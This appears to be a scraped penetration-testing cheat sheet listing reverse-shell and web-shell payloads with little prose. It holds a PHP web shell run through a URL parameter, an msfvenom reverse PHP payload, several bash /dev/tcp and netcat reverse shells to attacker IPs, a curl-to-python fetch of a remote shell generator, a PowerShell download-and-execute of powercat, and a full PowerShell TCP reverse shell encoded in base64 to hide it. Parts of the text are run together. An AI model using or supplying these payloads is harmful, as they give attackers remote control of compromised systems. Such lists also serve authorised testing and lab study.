<?php echo system($_GET['cmd']); ?>http://example.com/shell.php?cmd=whoamimsfvenom -p php/reverse_php LHOST=192.168.45.213 LPORT=443 -o shell.php<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");<?php passthru("/bin/bash -i >& /dev/tcp/192.168.45.166/80 0>&1"); ?>
Last updated
bash -c "bash -i >& /dev/tcp/192.168.45.213/443 0>&1"nc -e /bin/sh 192.168.45.213 443curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 443 | xclip -selection clipboard
# Make sure Python webserver is running.
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell pwsh
# Replace it with above value
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText# Final command:
powershell --enc "$EncodedText"